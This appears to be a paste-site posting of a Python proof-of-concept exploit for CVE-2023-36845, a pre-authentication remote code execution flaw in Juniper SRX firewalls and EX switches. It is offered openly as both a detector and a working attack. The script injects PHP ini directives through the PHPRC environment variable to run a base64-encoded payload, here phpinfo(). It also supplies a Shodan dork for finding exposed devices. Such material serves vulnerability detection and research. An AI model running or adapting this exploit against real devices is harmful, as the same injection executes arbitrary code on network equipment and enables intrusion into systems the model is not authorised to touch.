FlyFar

Juniper-SRX-Firewalls&EX-switches - (PreAuth-RCE) (PoC)

Feb 2nd, 2024
  1. # ***************************************************************************************************
  2. # Exploit Title: juniper-SRX-Firewalls&EX-switches (PreAuth-RCE) (PoC)
  3. # Description:
  4. #
  5. # This code serves as both a vulnerability detector and a proof of concept for CVE-2023-36845.
  6. # It executes the phpinfo() function on the login page of the target device,
  7. # allowing the PHP configuration to be inspected. This script can also save the phpinfo()
  8. # output to a file for further analysis.
  9. #
  10. # Shodan Dork: http.favicon.hash:2141724739
  11. # Date: 2023/10/01
  12. # Exploit Author: whiteOwl (whiteowl.pub@gmail.com)
  13. # Vendor Homepage: https://whiteowl-pub.github.io
  14. # Version: Versions prior to 20.4R3-S9, 21.1R1, 21.2R3-S7, 21.3R3-S5,
  15. #          21.4R3-S5, 22.1R3-S4, 22.2R3-S2, 22.3R2-S2/R3-S1,
  16. #          22.4R2-S1/R3, 23.2R1-S1/R2
  17. # Tested on: JUNOS SM804122pri 15.1X49-D170.4
  18. # CVE : cve-2023-36845
  19. # ***************************************************************************************************
  20.  
  21. import argparse
  22. import requests
  23.  
# Start-up banner; main() prints it before parsing the command line.
banner = """
*************************************************************
* CVE-2023-36845 Vulnerability Detector & Proof of concept  *
* This script checks for the CVE-2023-36845 vulnerability   *
* and run phpinfo() on vulnerable devices.                  *
* If you suspect a vulnerable system, please take action    *
* immediately to secure it.                                 *
*                                                           *
* Author: whiteowl                                          *
*************************************************************
"""
  35.  
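def send_request(url, output_file=None, verbose=False):
    """Probe *url* for CVE-2023-36845 and print the verdict.

    Sends one POST request whose query string sets ``PHPRC=/dev/fd/0`` and
    whose body carries PHP ini directives that auto-prepend a ``phpinfo()``
    call, then inspects the response.

    A 200 status alone is not treated as proof: any web server that answers
    200 for this path would otherwise be reported as vulnerable, so the body
    must also contain phpinfo() output before the device is flagged.

    Args:
        url: Base URL of the device's web interface.
        output_file: Optional path; when set, the response body is written
            to it as UTF-8.
        verbose: When true, also print the status code, response headers
            and response body.

    Returns:
        None. ``requests`` errors (connection, TLS, timeout) are caught and
        printed rather than raised.
    """
    # A trailing slash on the base URL would otherwise yield "//?PHPRC=...".
    target_url = f"{url.rstrip('/')}/?PHPRC=/dev/fd/0"
    data = 'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'

    headers = {
        'User-Agent': 'Mozilla/5.0',
    }

    try:
        # timeout: without it requests waits indefinitely on a silent host.
        # The with-block releases the streamed connection on every exit path.
        with requests.post(
            target_url,
            headers=headers,
            data=data,
            stream=True,
            timeout=15,
        ) as response:
            body = response.text

            if response.status_code != 200:
                print("Not Vulnerable: Status Code", response.status_code)
            elif "PHP Version" in body:
                # phpinfo() output always carries a "PHP Version" entry.
                print("The Target Device is Vulnerable to: CVE-2023-36845")
            else:
                print("Inconclusive: Status Code 200 but no phpinfo() output in the response")

            if output_file:
                # phpinfo() output exposes configuration and environment
                # details; treat the saved file as sensitive.
                with open(output_file, 'w', encoding='utf-8') as file:
                    file.write(body)

            if verbose:
                print(f"HTTP Status Code: {response.status_code}")
                print("Response Headers:")
                for header, value in response.headers.items():
                    print(f"{header}: {value}")
                print("Response Content:")
                print(body)
    except requests.exceptions.RequestException as e:
        print(f"An error occurred: {e}")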
  64.  
def main():
    """Command-line entry point: print the banner, parse options, run the probe.

    Options: -u/--url (required), -o/--output (optional file path) and
    -v/--verbose (flag). The parsed values are handed to send_request().
    """
    print(banner)

    cli = argparse.ArgumentParser(description="Custom curl-like script")
    cli.add_argument("-u", "--url", required=True, help="URL to send the HTTP request")
    cli.add_argument("-o", "--output", help="Output file to save the HTML content")
    cli.add_argument("-v", "--verbose", action="store_true", help="Enable verbose mode")
    opts = cli.parse_args()

    send_request(url=opts.url, output_file=opts.output, verbose=opts.verbose)


# Run the CLI only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
  77.            